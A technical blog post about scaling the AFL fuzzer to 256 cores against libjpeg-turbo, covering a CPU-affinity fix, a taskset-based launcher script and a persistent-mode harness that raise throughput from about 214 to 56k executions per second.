unset AFL_USE_ASAN AFL_USE_MSAN; AFL_QUIET=1 AFL_INST_RATIO=100 AFL_PATH=. ./afl-gcc -O3 -funroll-loops -Wall -D_FORTIFY_SOURCE=2 -g -Wno-pointer-sign -DAFL_PATH=\"/usr/local/lib/afl\" -DDOC_PATH=\"/usr/local/share/doc/afl\" -DBIN_PATH=\"/usr/local/bin\" test-instr.c -o test-instr -ldl
echo 0 | ./afl-showmap -m none -q -o .test-instr0 ./test-instr
echo 1 | ./afl-showmap -m none -q -o .test-instr1 ./test-instr
[+] All right, the instrumentation seems to be working!
[+] LLVM users: see llvm_mode/README.llvm for a faster alternative to afl-gcc.
[+] All done! Be sure to review README - it's pretty short and useful.

Out of the box AFL gives us some compiler wrappers for gcc and clang, afl-gcc and afl-clang respectively. We’ll use these to build the libjpeg-turbo source so AFL adds instrumentation that is used for coverage and feedback. Which is critical to modern fuzzer operation, especially when just doing byte flipping like AFL does.

Let’s grab libjpeg-turbo and build it:

pleb@debphi:~/blogging$ git clone https://github.com/libjpeg-turbo/libjpeg-turbo
Cloning into 'libjpeg-turbo'...
remote: Counting objects: 13559, done.
remote: Compressing objects: 100% (40/40), done.
remote: Total 13559 (delta 14), reused 8 (delta 1), pack-reused 13518
Receiving objects: 100% (13559/13559), 11.67 MiB | 8.72 MiB/s, done.
Resolving deltas: 100% (10090/10090), done.
pleb@debphi:~/blogging$ mkdir buildjpeg
pleb@debphi:~/blogging$ cd buildjpeg/
pleb@debphi:~/blogging/buildjpeg$ export PATH=$PATH:/home/pleb/blogging/afl-2.52b
pleb@debphi:~/blogging/buildjpeg$ cmake -G"Unix Makefiles" -DCMAKE_C_COMPILER=afl-gcc -DCMAKE_C_FLAGS=-m32 /home/pleb/blogging/libjpeg-turbo/
...
pleb@debphi:~/blogging/buildjpeg$ make -j256
...
[100%] Built target tjunittest-static
pleb@debphi:~/blogging/buildjpeg$ ls
cjpeg           CMakeFiles             CTestTestfile.cmake  jconfig.h     jpegtran         libjpeg.map    libjpeg.so.62.3.0  libturbojpeg.so.0      md5         sharedlib  tjbench-static  tjexampletest      wrjpgcom
cjpeg-static    cmake_install.cmake    djpeg                jconfigint.h  jpegtran-static  libjpeg.so     libturbojpeg.a     libturbojpeg.so.0.2.0  pkgscripts  simd       tjbenchtest     tjunittest
CMakeCache.txt  cmake_uninstall.cmake  djpeg-static         jcstest       libjpeg.a        libjpeg.so.62  libturbojpeg.so    Makefile               rdjpgcom    tjbench    tjexample       tjunittest-static

Woo! We have a libjpeg-turbo built with AFL and instrumented! We now have a ./djpeg which is what we’re going to use to fuzz. We need a test input corpus of JPEGs, however since we’re benchmarking I just picked a single JPEG that is 3.2 KiB in size. We’ll set up AFL and fuzz this with no frills:

pleb@debphi:~/blogging$ mkdir fuzzing
pleb@debphi:~/blogging$ cd fuzzing/
pleb@debphi:~/blogging/fuzzing$ mkdir inputs
... Copy in an input
pleb@debphi:~/blogging/fuzzing$ mkdir outputs
pleb@debphi:~/blogging/fuzzing$ afl-fuzz -h
pleb@debphi:~/blogging/fuzzing$ afl-fuzz -i inputs/ -o outputs/ -- ../buildjpeg/djpeg @@

Now we’re hacking!

Oh wow we're a hacker

It’s important that you keep an eye on exec speed as it can flutter around during different passes, in this case 210-220 is where it seemed to hover around on average. So I’ll be using the 214.4 number from the picture as the baseline for this first test.

Using all your cores

I’ve got some sad news though. This isn’t using anything but a single core. We have a 256 thread machine and we’re using 1/256th of it to fuzz, what a waste of silicon. Sadly there’s no trivial way to spin up AFL so lets just cheat and grab something that does it for us: afl-launch . This requires go but the instructions are pretty clear on how to get it set up and running. It takes effectively the exact same args as afl-fuzz but it takes an -n parameter that spins up multiple jobs for us. Let’s also switch to a ramdisk to decrease thrashing of the disk (doesn’t matter that much anyways due to FS caching):

pleb@debphi:~/blogging/fuzzing$ rm -rf /mnt/ram/outputs/*
pleb@debphi:~/blogging/fuzzing$ ~/go/bin/afl-launch -n 256 -i /mnt/ram/inputs/ -o /mnt/ram/outputs/ -- ../buildjpeg/djpeg @@

And we expect roughly 214 * 64 (number of exec/sec on single core * number of physical cores) = 14k execs/sec. In reality I expect even more than this due to hyperthreading.

pleb@debphi:~/blogging/fuzzing$ ps a | grep afl-fuzz | grep -v grep | wc -l
256
pleb@debphi:~/blogging/fuzzing$ afl-whatsup -s /mnt/ram/outputs/
status check tool for afl-fuzz by <[email protected]>

Summary stats
=============

       Fuzzers alive : 256
      Total run time : 0 days, 10 hours
         Total execs : 0 million
    Cumulative speed : 4108 execs/sec
       Pending paths : 455 faves, 14932 total
  Pending per fuzzer : 1 faves, 58 total (on average)
       Crashes found : 0 locally unique

Hmm? What? I’m running 256 instances, afl-whatsup confirms that, but I’m only getting 4.1k execs/sec? That’s a 20x speedup running 256 threads!? Hmm, this is no good. We even switched to a ramdisk so we even have an advantage over the single threaded run. Let’s check out that CPU utilization:

Wait what

Actually using all your cores

Okay, so apparently we’re only using 22 threads even though we have 256 processes running. Linux will evenly distribute threads so AFL must be doing something special here. If we just look around for affinity in the AFL codebase we stumble across this:

/* Build a list of processes bound to specific cores. Returns -1 if nothing
   can be found. Assumes an upper bound of 4k CPUs. */

static void bind_to_free_cpu(void) {

  DIR* d;
  struct dirent* de;
  cpu_set_t c;

  u8 cpu_used[4096] = { 0 };
  u32 i;

  if (cpu_core_count < 2) return;

  if (getenv("AFL_NO_AFFINITY")) {

    WARNF("Not binding to a CPU core (AFL_NO_AFFINITY set).");
    return;

  }

  d = opendir("/proc");

  if (!d) {

    WARNF("Unable to access /proc - can't scan for free CPU cores.");
    return;

  }

  ACTF("Checking CPU core loadout...");

  /* Introduce some jitter, in case multiple AFL tasks are doing the same
     thing at the same time... */

  usleep(R(1000) * 250);

  /* Scan all /proc/<pid>/status entries, checking for Cpus_allowed_list.
     Flag all processes bound to a specific CPU using cpu_used[]. This will
     fail for some exotic binding setups, but is likely good enough in almost
     all real-world use cases. */

  while ((de = readdir(d))) {

    u8* fn;
    FILE* f;
    u8 tmp[MAX_LINE];
    u8 has_vmsize = 0;

    if (!isdigit(de->d_name[0])) continue;

    fn = alloc_printf("/proc/%s/status", de->d_name);

    if (!(f = fopen(fn, "r"))) {
      ck_free(fn);
      continue;
    }

    while (fgets(tmp, MAX_LINE, f)) {

      u32 hval;

      /* Processes without VmSize are probably kernel tasks. */

      if (!strncmp(tmp, "VmSize:\t", 8)) has_vmsize = 1;

      if (!strncmp(tmp, "Cpus_allowed_list:\t", 19) &&
          !strchr(tmp, '-') && !strchr(tmp, ',') &&
          sscanf(tmp + 19, "%u", &hval) == 1 && hval < sizeof(cpu_used) &&
          has_vmsize) {

        cpu_used[hval] = 1;
        break;

      }

    }

    ck_free(fn);
    fclose(f);

  }

  closedir(d);

  for (i = 0; i < cpu_core_count; i++) if (!cpu_used[i]) break;

  if (i == cpu_core_count) {

    SAYF("\n" cLRD "[-] " cRST
         "Uh-oh, looks like all %u CPU cores on your system are allocated to\n"
         "    other instances of afl-fuzz (or similar CPU-locked tasks). Starting\n"
         "    another fuzzer on this machine is probably a bad plan, but if you are\n"
         "    absolutely sure, you can set AFL_NO_AFFINITY and try again.\n",
         cpu_core_count);

    FATAL("No more free CPU cores");

  }

  OKF("Found a free CPU core, binding to #%u.", i);

  cpu_aff = i;

  CPU_ZERO(&c);
  CPU_SET(i, &c);

  if (sched_setaffinity(0, sizeof(c), &c))
    PFATAL("sched_setaffinity failed");

}

#endif /* HAVE_AFFINITY */

We can see that this code does some interesting processing on procfs to find which processors are not in use, and then pins to them. Interestingly we never get the “Uh-oh” message saying we’re out of CPUs, and all 256 of our instances are running. The only way this is possible is if AFL is binding multiple processes to the same core. This is possible due to races on the procfs and the CPU masks not getting updated right away, so some delay has to be added between spinning up AFL instances. But we can do better.

We see at the top of this function this functionality can be turned off entirely by setting the AFL_NO_AFFINITY environment variable. Lets do that and then manage the affinities ourselves. We’re also going to drop the afl-launch tool and just do it ourselves.

import subprocess, threading, time, shutil, os

NUM_CPUS = 256

INPUT_DIR  = "/mnt/ram/jpegs"
OUTPUT_DIR = "/mnt/ram/outputs"

def do_work(cpu):
    master_arg = "-M"
    if cpu != 0:
        master_arg = "-S"

    # Restart if it dies, which happens on startup a bit
    while True:
        try:
            sp = subprocess.Popen([
                "taskset", "-c", "%d" % cpu,
                "afl-fuzz", "-i", INPUT_DIR, "-o", OUTPUT_DIR,
                master_arg, "fuzzer%d" % cpu, "--",
                "../buildjpeg/djpeg", "@@"],
                stdout=subprocess.PIPE, stderr=subprocess.PIPE)
            sp.wait()
        except:
            pass

        print("CPU %d afl-fuzz instance died" % cpu)

        # Some backoff if we fail to run
        time.sleep(1.0)

assert os.path.exists(INPUT_DIR), "Invalid input directory"

if os.path.exists(OUTPUT_DIR):
    print("Deleting old output directory")
    shutil.rmtree(OUTPUT_DIR)

print("Creating output directory")
os.mkdir(OUTPUT_DIR)

# Disable AFL affinity as we do it better
os.environ["AFL_NO_AFFINITY"] = "1"

for cpu in range(0, NUM_CPUS):
    threading.Timer(0.0, do_work, args=[cpu]).start()

    # Let master stabilize first
    if cpu == 0:
        time.sleep(1.0)

while threading.active_count() > 1:
    time.sleep(5.0)

    try:
        subprocess.check_call(["afl-whatsup", "-s", OUTPUT_DIR])
    except:
        pass

By using taskset when we spawn AFL processes we manually control the core rather than AFL trying to figure out what is not being used as we know what’s not used since we’re launching everything. Further we os.environ["AFL_NO_AFFINITY"] = "1" to make sure AFL doesn’t get control over affinity as we now manage it. We’ve got some other things in here like where we give 1 second of delay after the master instance, we automatically clean up the ouput directory, and call afl-whatsup in a loop. We also restart dead afl-fuzz instances which I’ve observed can happen sometimes when spawning everything at once.

status check tool for afl-fuzz by <[email protected]>

Summary stats
=============

       Fuzzers alive : 256
      Total run time : 1 days, 0 hours
         Total execs : 6 million
    Cumulative speed : 18363 execs/sec
       Pending paths : 1 faves, 112903 total
  Pending per fuzzer : 0 faves, 441 total (on average)
       Crashes found : 0 locally unique

But it worked

Well that gave us a 4.5x speedup! Look at that CPU utilization!

Optimizing our target for maxium CPU time

We’re now using 100% of all cores. If you’re no htop master you might not know that the red means kernel time on the bars. This means that (eyeballing it) we’re spending about 50% of the CPU time in the kernel. Any time in the kernel is time not spent fuzzing JPEGs. At this point we’ve got AFL doing everything it can, but we’re gonna have to get more creative with our target.

So this is telling us we must be able to find at least a 2x speedup on this target, moving our goal to 40k execs/sec. It’s possible kernel usage is unavoidable, but for something like libjpeg-turbo it would be unreasonable to spend any large amount of time in the kernel anyways. Let’s use everything AFL gives us by using afl persistent mode. This effectively allows you to run multiple fuzz cases in a single instance of the program rather than reverting program state back every fuzz case via clone() or fork(). This can reduce that kernel overhead we’re worried about.

Let’s set up the persistent mode environment by building afl-clang-fast.

pleb@debphi:~/blogging$ cd afl-2.52b/llvm_mode/
pleb@debphi:~/blogging/afl-2.52b/llvm_mode$ make -j8
[*] Checking for working 'llvm-config'...
[*] Checking for working 'clang'...
[*] Checking for '../afl-showmap'...
[+] All set and ready to build.
clang -O3 -funroll-loops -Wall -D_FORTIFY_SOURCE=2 -g -Wno-pointer-sign -DAFL_PATH=\"/usr/local/lib/afl\" -DBIN_PATH=\"/usr/local/bin\" -DVERSION=\"2.52b\"  afl-clang-fast.c -o ../afl-clang-fast
ln -sf afl-clang-fast ../afl-clang-fast++
clang++ `llvm-config --cxxflags` -fno-rtti -fpic -O3 -funroll-loops -Wall -D_FORTIFY_SOURCE=2 -g -Wno-pointer-sign -DVERSION=\"2.52b\" -Wno-variadic-macros -shared afl-llvm-pass.so.cc -o ../afl-llvm-pass.so `llvm-config --ldflags`
warning: unknown warning option '-Wno-maybe-uninitialized'; did you mean '-Wno-uninitialized'? [-Wunknown-warning-option]
1 warning generated.
clang -O3 -funroll-loops -Wall -D_FORTIFY_SOURCE=2 -g -Wno-pointer-sign -DAFL_PATH=\"/usr/local/lib/afl\" -DBIN_PATH=\"/usr/local/bin\" -DVERSION=\"2.52b\"  -fPIC -c afl-llvm-rt.o.c -o ../afl-llvm-rt.o
[*] Building 32-bit variant of the runtime (-m32)... success!
[*] Building 64-bit variant of the runtime (-m64)... success!
[*] Testing the CC wrapper and instrumentation output...
unset AFL_USE_ASAN AFL_USE_MSAN AFL_INST_RATIO; AFL_QUIET=1 AFL_PATH=. AFL_CC=clang ../afl-clang-fast -O3 -funroll-loops -Wall -D_FORTIFY_SOURCE=2 -g -Wno-pointer-sign -DAFL_PATH=\"/usr/local/lib/afl\" -DBIN_PATH=\"/usr/local/bin\" -DVERSION=\"2.52b\"  ../test-instr.c -o test-instr
echo 0 | ../afl-showmap -m none -q -o .test-instr0 ./test-instr
echo 1 | ../afl-showmap -m none -q -o .test-instr1 ./test-instr
[+] All right, the instrumentation seems to be working!
[+] All done! You can now use '../afl-clang-fast' to compile programs.

Now we have an afl-clang-fast binary in the afl-2.52b folder. Let’s rebuild libjpeg-turbo using this

pleb@debphi:~/blogging/buildjpeg$ cmake -G"Unix Makefiles" -DCMAKE_C_COMPILER=afl-clang-fast -DCMAKE_C_FLAGS=-m32 /home/pleb/blogging/libjpeg-turbo/
pleb@debphi:~/blogging/buildjpeg$ make -j256
...
[100%] Built target jpegtran-static
afl-clang-fast 2.52b by <[email protected]>
[100%] Built target jpegtran

So, libjpeg-turbo is a library. Meaning it’s designed to be used from other programs. It’s also one of the most popular libraries for image compression, so surely it’s relatively easy to use. Let’s quickly write up a bare-bones application that loads an image from a provided argument:

#include <stdlib.h>
#include <stdio.h>
#include <unistd.h>
#include <fcntl.h>
#include "jpeglib.h"
#include <setjmp.h>

struct my_error_mgr {
  struct jpeg_error_mgr pub;    /* "public" fields */
  jmp_buf setjmp_buffer;        /* for return to caller */
};

typedef struct my_error_mgr * my_error_ptr;

// Longjmp out on errors
METHODDEF(void)
my_error_exit(j_common_ptr cinfo)
{
  my_error_ptr myerr = (my_error_ptr) cinfo->err;
  longjmp(myerr->setjmp_buffer, 1);
}


// Eat warnings
METHODDEF(void)
emit_message(j_common_ptr cinfo, int msg_level) {}

GLOBAL(int)
read_JPEG_file (char * filename, unsigned char *filebuf, size_t filebuflen)
{
  struct jpeg_decompress_struct cinfo;
  struct my_error_mgr jerr;
  JSAMPARRAY buffer;            /* Output row buffer */
  int row_stride;               /* physical row width in output buffer */
  int fd;
  ssize_t flen;

  fd = open(filename, O_RDONLY);
  if(fd == -1){
    return 0;
  }

  flen = read(fd, (void*)filebuf, filebuflen);
  close(fd);

  if(flen <= 0){
    return 0;
  }

  cinfo.err = jpeg_std_error(&jerr.pub);
  jerr.pub.error_exit = my_error_exit;
  jerr.pub.emit_message = emit_message;

  /* Establish the setjmp return context for my_error_exit to use. */
  if (setjmp(jerr.setjmp_buffer)) {
    jpeg_destroy_decompress(&cinfo);
    return 0;
  }

  jpeg_create_decompress(&cinfo);
  jpeg_mem_src(&cinfo, filebuf, flen);
  (void) jpeg_read_header(&cinfo, TRUE);
  (void) jpeg_start_decompress(&cinfo);
  row_stride = cinfo.output_width * cinfo.output_components;
  buffer = (*cinfo.mem->alloc_sarray)
                ((j_common_ptr) &cinfo, JPOOL_IMAGE, row_stride, 1);

  while (cinfo.output_scanline < cinfo.output_height) {
    (void) jpeg_read_scanlines(&cinfo, buffer, 1);
  }

  (void) jpeg_finish_decompress(&cinfo);
  jpeg_destroy_decompress(&cinfo);
  return 1;
}

int main(int argc, char *argv[]) {
  void *filebuf = NULL;
  const size_t filebuflen = 32 * 1024;

  if(argc != 2) { fprintf(stderr, "Nice usage noob\n"); return -1; }

  filebuf = malloc(filebuflen);
  if(!filebuf) {
    return -1;
  }

  while(__AFL_LOOP(100000)) {
    read_JPEG_file(argv[1], filebuf, filebuflen);
  }
}

This can be built with:

AFL_PATH=/home/pleb/blogging/afl-2.52b afl-clang-fast -O2 -m32 example.c -I/home/pleb/blogging/buildjpeg -I/home/pleb/blogging/libjpeg-turbo /home/pleb/blogging/buildjpeg/libjpeg.a

You can see the code this was derived from with more comments here which I modified to my specific needs and removed almost all comments to keep code as small as possible. It’s also relatively simple to read based off function names.

We made a few changes to the code. We removed all output from the code. It should not print to the screen for warnings or errors, it should not save any files, it should only parse the input. It then will correctly return up via setjmp()/longjmp() on errors and allow us to quickly move to the next case.

You can see we introduced __AFL_LOOP here. This is a special meaning to running this code but only under afl-fuzz. When running it uses signals to notify that it is done with a fuzz case and needs a new one. This loop we set at a limit of 100,000 iterations before tearing down the child and restarting. It’s pretty simple and pretty clean. So now hopefully our syscall usage is down. Let’s check that first.

We’re going to run this new single threaded and verify it’s running as persistent:

pleb@debphi:~/blogging/jpeg_fuzz$ afl-fuzz -i /mnt/ram/jpegs/ -o /mnt/ram/outputs/ -- ./a.out @@
...
[+] Persistent mode binary detected. <<< WOO!

Yay

Woo, it’s just a little under 2x faster than the initial single threaded djpeg (we’re running this one ramdisk, but I verified that was not relevant here). It’s just running faster because we’re doing less misc things in the kernel and the code itself.

So AFL tells us that it is persistent, but let’s triple check by running strace on the fuzz process:

ps aux | grep "R.*a.out" | grep -v grep | awk '{print "-p " $2}' | xargs strace

It’s a bit ugly but we strace any actively running a.out task, since it’s crude it might take a few tries to get attached to the right one but I’m no bash pro.

We can see we get a repeating pattern:

openat(AT_FDCWD, "/mnt/ram/outputs//.cur_input", O_RDONLY) = 3
read(3, "\377\330\377\340\0\20JFIF\0\1\1\0\0\1\0\1\0\0\377\333\0C\0\5\3\4\4\4\3\5"..., 32768) = 3251
close(3)                                = 0
rt_sigprocmask(SIG_BLOCK, ~[RTMIN RT_1], [], 8) = 0
getpid()                                = 53786
gettid()                                = 53786
tgkill(53786, 53786, SIGSTOP)           = 0
--- SIGSTOP {si_signo=SIGSTOP, si_code=SI_TKILL, si_pid=53786, si_uid=1000} ---
--- stopped by SIGSTOP ---
rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0
--- SIGCONT {si_signo=SIGCONT, si_code=SI_USER, si_pid=53776, si_uid=1000} ---
openat(AT_FDCWD, "/mnt/ram/outputs//.cur_input", O_RDONLY) = 3
read(3, "\377\330\377\340\0\20JFIF\0\1\1\0\0\1\0\1\0\0\377\333\0C\0\5\3\4\4\4\3\5"..., 32768) = 3251
close(3)                                = 0
rt_sigprocmask(SIG_BLOCK, ~[RTMIN RT_1], [], 8) = 0
getpid()                                = 53786
gettid()                                = 53786
tgkill(53786, 53786, SIGSTOP)           = 0
--- SIGSTOP {si_signo=SIGSTOP, si_code=SI_TKILL, si_pid=53786, si_uid=1000} ---
--- stopped by SIGSTOP ---
rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0
--- SIGCONT {si_signo=SIGCONT, si_code=SI_USER, si_pid=53776, si_uid=1000} ---

We see the openat to open, read to read the file, and close when it’s done parsing. So what is the rt_sigprocmask() and beyond? Well in persistent mode AFL uses this to communicate when fuzz cases are done. You can actually find this code in afl-2.52b/llvm_mode/afl-llvm-rt.o.c. There’s a descriptive comment:

    /* In persistent mode, the child stops itself with SIGSTOP to indicate
       a successful run. In this case, we want to wake it up without forking
       again. */

This means that the rt_sigprocmask() and beyond is out of our control. But other than that we’re doing the bare minimum to read a file by doing open, read, and close. Nothing else. We’re running tens of thousands of fuzz cases in a single instance of this program without having to exit() out and fork()!

Alright! Let’s put it all together and fuzz with this new binary on all cores!

status check tool for afl-fuzz by <[email protected]>

Summary stats
=============

       Fuzzers alive : 256
      Total run time : 1 days, 1 hours
         Total execs : 20 million
    Cumulative speed : 56003 execs/sec
       Pending paths : 1 faves, 122669 total
  Pending per fuzzer : 0 faves, 479 total (on average)
       Crashes found : 0 locally unique

Woo 56k per second! More than the 2x we were expecting from the custom written target. And I’ll save you another htop image and just tell you that now only about 8% of CPU time is spent in the kernel. Given we’re doing 7 syscalls per fuzz case, that means we’re doing about 400k per second, which still is fairly high but most of the syscalls are due to AFL and not us so they’re out of our control.

Conclusion

It’s pretty easy to get stuck thinking tools work out of the box. People usually worry about scaling at the level of “if it’s possible” rather than “is it actually doing more work”. It’s important to note that it’s very easy to run 64 instances of a tool and end up getting very little performance gain. In the world of fuzzing you usually should be able to scale linearly with cores, so if you’re only getting 1/2 efficiency it’s probably time to settle in and figure out if it’s in your control or not.

We were able to go from naive single-core AFL usage with 214 execs/sec, to “just run 256 AFLs” at 4k/sec, to doing some optimizations to get us to 56k/sec. All within a few hours of work. It’d be a shame if we would have just taken the 4k/sec and run with it, as we would be wasting almost all of our CPU.

Extra

This is my first blog, so please let me know anything you want more or less of. Follow me at @gamozolabs on Twitter if you want notifications when new blogs come up, or I think you can use RSS or something if you’re still one of those people.

Shoutouts

Shoutouts to @ScottyBauer1 and @marcograss on Twitter for giving me AFL tips and tricks for getting these numbers up

❌
❌